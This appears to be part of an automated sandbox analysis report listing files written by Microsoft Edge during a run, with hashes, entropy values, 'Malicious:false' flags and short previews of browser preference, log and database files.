                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10256531216745096
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:+sGyhsGy2spEjVl/PnnnnnnnnnnnvoQ/Eou:+8GoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                          MD5:E2429526522C9C174A0DC3DA95ECB421
                                                                                                                                                                                                                                                                                          SHA1:5AE67BE3BD30E3B57B33FE9FB95AEC0CD9849DE3
                                                                                                                                                                                                                                                                                          SHA-256:B48AB381F2FCA1B021A2C6D34C580A9FABB3136882899FE4050F835B289132AE
                                                                                                                                                                                                                                                                                          SHA-512:1DB4062BADE3E3E774C0C3B67E0CF7D77230DF6C5D93FB0CD1E93268B4C6FF1A771EEEAD9B9E29C92ABE2DD9C273B4C0A945CA8C9A35D689BE760ECA089231B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8904832855277037
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:frjhPyd5PifxwfkxzUexYajxa9AxBLUxoS1o0xev84yEyGVyGylAyZxyF9:B/xFxzxlxhxaxrxTm
                                                                                                                                                                                                                                                                                          MD5:02C4971B55D4EDBC6BCD3D8411656684
                                                                                                                                                                                                                                                                                          SHA1:08CAA7FAF6EE784FF02E59178F69601FB86D1F1C
                                                                                                                                                                                                                                                                                          SHA-256:345D6532C61209E3FFB141C945A7A2D59024BC41B2F68533EA91A94C980955C5
                                                                                                                                                                                                                                                                                          SHA-512:15C6622BDE07C192A2E5A3736290C43297F6DE1142CF081AF30DF038D1047319C643612C62FF242D2B9AA396D5EE5637A90408152F87D80CFA3F308516D47BF3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.697458451967152
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuuwnsedhOuM:llc8BOuuuuuuuuuuuuws8FM
                                                                                                                                                                                                                                                                                          MD5:8B56687329F70F8CEA3355F5B17DBE87
                                                                                                                                                                                                                                                                                          SHA1:7EFF693D450CAB6A6AE34496DAA43D0690391E84
                                                                                                                                                                                                                                                                                          SHA-256:80144B5D4780BCC79F02C1FC0227C7E3BD66470BCFE010CBD7527109C8502C09
                                                                                                                                                                                                                                                                                          SHA-512:08F6CB299926850C1945A596374CCF8431473B495E4D58BC9EBFF538E56A6989B90A81AB715B20F84960C3600273E66D3D0F283E951889E842EBD0D3FE737E5E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266736076243004
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro/UwE9+q2PcNwi23oH+TcwtfrK+IFUt8O8Ro/UwEJZmw+O8Roe9VkwOcNwi2R:7pI9+vLZYeb23FUt8OpIJ/+Ope9V54ZR
                                                                                                                                                                                                                                                                                          MD5:03D09B8EA16C6FF674EB3F71A653BC0E
                                                                                                                                                                                                                                                                                          SHA1:4E5545F3699631507800587FEE81C87B91F95E23
                                                                                                                                                                                                                                                                                          SHA-256:AD3F55EE49949CC1B96E8B264F16D66D27FC34F694B0365F6C0A6317FBAC49C8
                                                                                                                                                                                                                                                                                          SHA-512:9F368B5AE54E0EFEA71057165A39C98A7681D5C86E5E93A10A0639C1A18D31C7E93CCE745E49A6CC78D8FAF95B2ECEE052A8C5805FE3346E50F2DF8D870FC5C0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.369 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-03:45:53.369 19dc Recovering log #3.2024/12/19-03:45:53.370 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266736076243004
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro/UwE9+q2PcNwi23oH+TcwtfrK+IFUt8O8Ro/UwEJZmw+O8Roe9VkwOcNwi2R:7pI9+vLZYeb23FUt8OpIJ/+Ope9V54ZR
                                                                                                                                                                                                                                                                                          MD5:03D09B8EA16C6FF674EB3F71A653BC0E
                                                                                                                                                                                                                                                                                          SHA1:4E5545F3699631507800587FEE81C87B91F95E23
                                                                                                                                                                                                                                                                                          SHA-256:AD3F55EE49949CC1B96E8B264F16D66D27FC34F694B0365F6C0A6317FBAC49C8
                                                                                                                                                                                                                                                                                          SHA-512:9F368B5AE54E0EFEA71057165A39C98A7681D5C86E5E93A10A0639C1A18D31C7E93CCE745E49A6CC78D8FAF95B2ECEE052A8C5805FE3346E50F2DF8D870FC5C0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.369 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-03:45:53.369 19dc Recovering log #3.2024/12/19-03:45:53.370 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):782
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                          MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                          SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                          SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                          SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.265574656704517
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro99+q2PcNwi23oH+TcwtfrzAdIFUt8O8RoxCNJZmw+O8RoxCN9VkwOcNwi23q:7p99+vLZYeb9FUt8OpxCNJ/+OpxCN9VD
                                                                                                                                                                                                                                                                                          MD5:13B1C3D1BF8DF840638C950EDA421CDA
                                                                                                                                                                                                                                                                                          SHA1:523A12A0B8661832EC607FC021AA893710DD2ECE
                                                                                                                                                                                                                                                                                          SHA-256:A0F43B15FCA47BA5FC300C8231895459590A80F443CE47A9FCEBD2C13F2716BA
                                                                                                                                                                                                                                                                                          SHA-512:EDFE0697BE05B9EE4EDE8AE105CF935A12A2524C6D79A7A867AC943EC37CCB3248F4BA5A4857DBDE95566EF768494780CD5BB06EA9C782F6FFE1FA6152DC3D9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.366 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-03:45:53.367 19dc Recovering log #3.2024/12/19-03:45:53.367 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.265574656704517
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro99+q2PcNwi23oH+TcwtfrzAdIFUt8O8RoxCNJZmw+O8RoxCN9VkwOcNwi23q:7p99+vLZYeb9FUt8OpxCNJ/+OpxCN9VD
                                                                                                                                                                                                                                                                                          MD5:13B1C3D1BF8DF840638C950EDA421CDA
                                                                                                                                                                                                                                                                                          SHA1:523A12A0B8661832EC607FC021AA893710DD2ECE
                                                                                                                                                                                                                                                                                          SHA-256:A0F43B15FCA47BA5FC300C8231895459590A80F443CE47A9FCEBD2C13F2716BA
                                                                                                                                                                                                                                                                                          SHA-512:EDFE0697BE05B9EE4EDE8AE105CF935A12A2524C6D79A7A867AC943EC37CCB3248F4BA5A4857DBDE95566EF768494780CD5BB06EA9C782F6FFE1FA6152DC3D9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.366 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-03:45:53.367 19dc Recovering log #3.2024/12/19-03:45:53.367 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                          Malicious:false
